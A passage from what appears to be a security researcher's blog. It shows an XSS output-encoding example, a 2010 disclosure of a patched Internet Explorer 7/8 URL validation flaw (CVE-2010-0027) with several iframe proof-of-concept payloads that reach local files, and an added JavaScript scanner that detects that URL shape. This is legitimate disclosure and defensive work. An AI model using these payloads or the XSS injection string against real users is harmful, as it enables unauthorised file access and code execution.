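// starts with '">' closes the attribute and injects arbitrary elements.
function renderPreviewUnsafe(subject) {
  return '<div class="subject" title="' + subject + '">' + subject + '</div>';
}

// Hardened pattern: encode at every interpolation point for the context it
// lands in (here a double-quoted attribute and element text, both covered
// by escapeHtml).
function renderPreviewSafe(subject) {
  const encoded = escapeHtml(subject);
  return '<div class="subject" title="' + encoded + '">' + encoded + '</div>';
}

// In a browser or extension, assigning textContent is the simplest fix: the
// value is stored as text and never parsed as markup. `element` can be any
// object with a textContent property (a constructed stub object in tests).
function setSubjectText(element, subject) {
  element.textContent = String(subject);
  return element;
}

// Review helper: true when the rendered fragment contains any tag other than
// the expected <div> wrapper, i.e. the untrusted value introduced elements.
function introducesNewTags(html) {
  const tags = html.match(/<\/?[a-zA-Z][^>]*>/g) || [];
  return tags.some((tag) => !/^<\/?div\b/i.test(tag));
}

// Constructed sample: the logout-iframe subject from the Mail Checker Plus
// post; a PM title, forum title or chat nickname is handled identically.
const SAMPLE_SUBJECT =
  '"><iframe src="https://mail.google.com/mail/?logout&hl=es"></iframe>';

console.log('unsafe   :', renderPreviewUnsafe(SAMPLE_SUBJECT));
console.log('safe     :', renderPreviewSafe(SAMPLE_SUBJECT));
console.log('new tags?:', introducesNewTags(renderPreviewUnsafe(SAMPLE_SUBJECT)),
            introducesNewTags(renderPreviewSafe(SAMPLE_SUBJECT)));
```

Run it with node: the encoded version still displays the subject to the user, but the iframe (and therefore the logout XSRF) never becomes an element. Encoding is context-specific; the same rule applied in a URL, a JavaScript string or a CSS value needs that context's encoder, and a server-side application such as Webmatic applies it in its templates (PHP's htmlspecialchars does the equivalent of escapeHtml above).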

############################€ND#############################

Thanks to Estrella for being my light

Internet explorer 7 & 8 URL Validation Vulnerability

Wednesday, February 10, 2010
############################################
Internet Explorer 7 & 8 URL validation vulnerability
Original advisory: http://lostmon.blogspot.com/2010/02/internet-explorer-7-8-url-validation.html
Vendor URL: http://www.microsoft.com
Related advisory: http://lostmon.blogspot.com/2010/02/internet-explorer-6-7-8-url-validation.html
Related bulletins: MS10-002 and MS10-007
Related CVE: CVE-2010-0027
Related OSVDB ID: 62245 and 62245
Related Secunia: SA38501 and SA38209
Related BID: 37884
############################################


############
Description
############


A remote code execution vulnerability exists in the way
that Internet Explorer incorrectly validates input. An
attacker could exploit the vulnerability by constructing
a specially crafted URL. When a user clicks the URL, the
vulnerability could allow remote code execution. An
attacker who successfully exploited this vulnerability
could gain the same user rights as the logged-on user.
If a user is logged on with administrative user rights,
an attacker who successfully exploited this vulnerability
could take complete control of an affected system.


#################
Versions affected
#################

I have tested Internet Explorer 7 & 8
on these versions of Windows:

All versions of Windows 7
Windows XP Home
Windows XP Pro

See the exploitability index in the
related Microsoft bulletins for
a complete list of affected products.

#############
Timeline
#############

Discovered: 05-11-2009
Reported to vendor: 15-11-2009
Vendor response: 15-11-2009
Vendor accepted in case manager: 19-11-2009
Vendor patch: 21-01-2010
Vendor patch 2: 09-02-2010
Public disclosure: 21-01-2010
Details disclosure: 10-02-2010


##############
Solution
##############

See
http://www.microsoft.com/technet/security/Bulletin/ms10-002.mspx
and
http://www.microsoft.com/technet/security/Bulletin/ms10-007.mspx

for more details and to download the vendor's patch.

#######################
Sample code and PoCs
#######################

This vulnerability is based on the way
Internet Explorer validates URI handlers
and the special character '#'.

For testing and understanding, first open Internet Explorer
and type a fake handler such as 'handler:' in the address bar.
This causes IE to show the internal page 'res://ieframe.dll/unknownprotocol.htm',
because the protocol is unknown.
If we enter 'handler:http://[some-host]', IE waits to open
the host, but does not show any error or unknown-protocol
error page.

If we type 'handler:handler2:' in the address bar,
IE again shows the 'res://ieframe.dll/unknownprotocol.htm' page.

But if we concatenate two unknown protocol handlers and
use the special character '#', as in 'handler:handler#:',
Internet Explorer shows an alert warning:
'Internet Explorer cannot find file:///'

With this combination IE uses the file: protocol handler.

Given this alert we can think: if we concatenate two handlers, the '#'
character and a file path, we might be able to access files on the hard disk.

'handler:handler#:c:\windows\calc.exe'
But again we get 'Internet Explorer cannot find the file'.

Then we look for traversal file access, such as
'handler:handler#:../../../../C:\windows/calc.exe'
Then IE prompts us to download or execute the file.
We have bypassed the restrictions!!!

So far we have been working in the address bar.
Can a web page use this issue to do the same and ask
for a download? YES

We can construct a web page with an iframe like:

############# PoC one #################
<html>
<iframe id="myIframe"
src="handler:handler#:../../../../C:\windows/calc.exe"></iframe>
</html>
################# EOF #################

If we open it from a local folder, a local server, a LAN server
or a remote server, in all cases IE asks to download the file.

Then we can access any file on the hard disk, so
can we execute or read the content of a file?? YES

If we know the path of a txt file we can do the same
(put a txt file in the C: root and write some content in it)
and then:

############## PoC Two #############
<html>
<iframe id="myIframe"
src="handler:handler#:../../../../C:\our_txtfile.txt"></iframe>
</html>

############# EOF #################

When we open this PoC, it reads the content of our_txtfile.txt
and shows it in the frame.


Can we execute files?? YES

We can execute an html file, an xml file or a search-ms file
from the hard disk, for example:

############# PoC Three ###############
<html>
<iframe id="myIframe"
src="handler:handler#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms">
</iframe>
</html>

############### EOF ###########

If we look, it launches Explorer with a local search :D


Can we read the content of any file and upload it to a server, or
manipulate the content??

I have not found a way to do it;
every time, Internet Explorer denies access to the content from
the iframe.

############# PoC four ##############

<html>
<head>
</head>
<body>
<script type="text/javascript">
function getContentFromIframe(iFrameName)
{
var myIFrame = document.getElementById(iFrameName);
var content = myIFrame.contentWindow.document.body.innerHTML;
alert('content: ' + content);

content = 'change iframe content';
myIFrame.contentWindow.document.body.innerHTML = content;
}
</script> <iframe id="myIframe"
src="handler:handler#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms"></iframe>

<a href="#" onclick="getContentFromIframe('myIframe')">Get the content</a>

</body>
</html>

##################### EOF #############################

It gives an access denied error.
If we try to use XMLHttpRequest(),

it does not work either and access is denied:

########### PoC Five ######################
var contents;
var req;
// onreadystatechange callback (added here; the original listing referenced
// it without defining it): show the response once the request completes.
function processReqChange() {
  if (req.readyState == 4) {
    contents = req.responseText;
    alert(contents);
  }
}
req = new XMLHttpRequest();
req.onreadystatechange = processReqChange;
req.open('GET',
"handler:document.write%28'shit#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms",
true);
req.send('');
############ EOF #############

If we use it as an ActiveX object, it
again shows access denied :P

############### PoC six #############

<html><body><div>

<script>
function getHTTPObject()
{
if (typeof XMLHttpRequest != 'undefined')
{
return new XMLHttpRequest();
}
try {
return new ActiveXObject("Msxml2.XMLHTTP"); }
catch (e)
{
try
{
return new ActiveXObject("Microsoft.XMLHTTP");
}
catch (e) {}
}
return false;
}
x = getHTTPObject();
x.open("GET","shit:shit#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms",false);
x.send(null);
alert(x.responseText);

</script>

</div></body></html>

################ EOF ######################

So we can conclude that we can read txt files; execute html, xml and
search-ms files; and download and execute binary files from the
victim's hard disk, just by viewing a crafted web page.
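The technique explained above, an unknown scheme followed by a second scheme-like token, a '#:' separator and '../' traversal towards a local path, has a recognisable shape that a defender can look for in page content or mail bodies before a browser ever sees it. The JavaScript below is an added example, not part of the advisory, that scores a URL against that shape and scans the src/href attributes of an HTML document for it; the scheme allow-list, the finding names and the sample document (which embeds the iframe from PoC one) are assumptions made for this illustration. It judges shape only and never opens or fetches a URL.

```javascript
// Added example (not from the advisory): flag URLs shaped like the
// "handler:handler#:../../../../C:\..." trick, for content review,
// mail-gateway scanning or a link sanitiser. Inspects shape only; never
// dereferences the URL. Runs under Node.js.

// Assumed allow-list; extend it to the schemes a given site legitimately links to.
const ALLOWED_SCHEMES = new Set(['http', 'https', 'mailto']);

const SCHEME_RE        = /^([a-z][a-z0-9+.-]*):/i;      // RFC 3986 scheme prefix
const NESTED_SCHEME_RE = /^[a-z][a-z0-9+.-]*#?:/i;      // second scheme-like token, "#" optional
const TRAVERSAL_RE     = /(^|[\\/:#])\.\.(?=[\\/])/;    // ".." followed by a path separator
const DRIVE_PATH_RE    = /(^|[^a-z0-9])[a-z]:[\\/]/i;   // "C:\" or "C:/" after the scheme

// Returns { url, suspicious, findings }. "suspicious" requires both a
// scheme-handling trick (nested scheme or "#:") and a local-file indicator
// (traversal or drive path); an unlisted scheme on its own is only noted.
function analyzeUrl(url) {
  const findings = [];
  const m = SCHEME_RE.exec(url);
  if (!m) return { url, suspicious: false, findings };   // relative URL: no scheme to judge

  const scheme = m[1].toLowerCase();
  const rest = url.slice(m[0].length);

  if (!ALLOWED_SCHEMES.has(scheme)) findings.push('unlisted-scheme:' + scheme);
  if (NESTED_SCHEME_RE.test(rest)) findings.push('nested-scheme');
  if (rest.includes('#:')) findings.push('hash-colon');
  if (TRAVERSAL_RE.test(rest)) findings.push('dot-dot-traversal');
  if (DRIVE_PATH_RE.test(rest)) findings.push('local-drive-path');

  const schemeTrick = findings.includes('nested-scheme') || findings.includes('hash-colon');
  const localFile = findings.includes('dot-dot-traversal') || findings.includes('local-drive-path');
  return { url, suspicious: schemeTrick && localFile, findings };
}

// Pull src= and href= values out of an HTML string (double-, single- or unquoted).
function extractLinks(html) {
  const attr = /\b(?:src|href)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;
  const links = [];
  let m;
  while ((m = attr.exec(html)) !== null) {
    links.push(m[1] !== undefined ? m[1] : m[2] !== undefined ? m[2] : m[3]);
  }
  return links;
}

// Analyse every link in a document and keep only the suspicious ones.
function scanHtml(html) {
  return extractLinks(html).map(analyzeUrl).filter((r) => r.suspicious);
}

// Constructed sample page: two ordinary references plus the iframe from PoC one.
const SAMPLE_HTML = [
  '<html><body>',
  '<a href="https://example.com/page.html">normal link</a>',
  '<img src="/static/logo.png">',
  '<iframe id="myIframe" src="handler:handler#:../../../../C:\\windows/calc.exe"></iframe>',
  '</body></html>',
].join('\n');

for (const hit of scanHtml(SAMPLE_HTML)) {
  console.log('suspicious:', hit.url, '->', hit.findings.join(', '));
}
```

The scoring deliberately needs two independent signals so that a legitimate text-fragment anchor such as '#:~:text=' or a plain unknown scheme does not fire on its own; tune the allow-list and the pairing rule to the content being reviewed, and treat a hit as something to quarantine and inspect, not as proof of exploitation.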

Microsoft has patched it and released security bulletins
that address this issue; see
http://www.microsoft.com/technet/security/Bulletin/ms10-002.mspx
and
http://www.microsoft.com/technet/security/Bulletin/ms10-007.mspx
for details and to download the security update, which fixes this
issue and seven more vulnerabilities.

#################### €nd ################

Thanks to the Google Security Team for their support
Thanks to MSRC for their support and acknowledgments
Thanks to icar0 & sha0 from Badchecksum
Thanks to Brink for testing with me on some Windows versions :D
Thanks to Estrella for being my light

Internet explorer 6 7 8 URL Validation Vulnerability

Thursday, January 21, 2010
###################################
Internet Explorer 6, 7 and 8 URL Validation Vulnerability
Vendor: http://www.Microsoft.com
Vendor notified: YES  Vendor confirmed: YES
Ref. bulletin: MS10-002
#########################################

A remote code execution vulnerability exists in the way that Internet Explorer incorrectly validates input. An attacker could exploit the vulnerability by constructing a specially crafted URL. When a user clicks the URL, the vulnerability could allow remote code execution. An attacker who successfully exploited this vulnerability could gain the same user rights as the logged-on user. If a user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

To view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see MS10-002 and CVE-2010-0027.

No more details at this time. I have a PoC, but at this moment it is private.

Time Line for this vulnerability:

Discovered: 05-11-2009
Reported to vendor: 15-11-2009
Vendor response: 15-11-2009
Vendor accepted in case manager: 19-11-2009
Vendor patch: 21-01-2010

#################€nd#############

Thanks to Estrella for being my light
Thanks to icar0 & sha0 from Badchecksum
Thanks to the Google Security Team for support
Thanks to MSRC for support

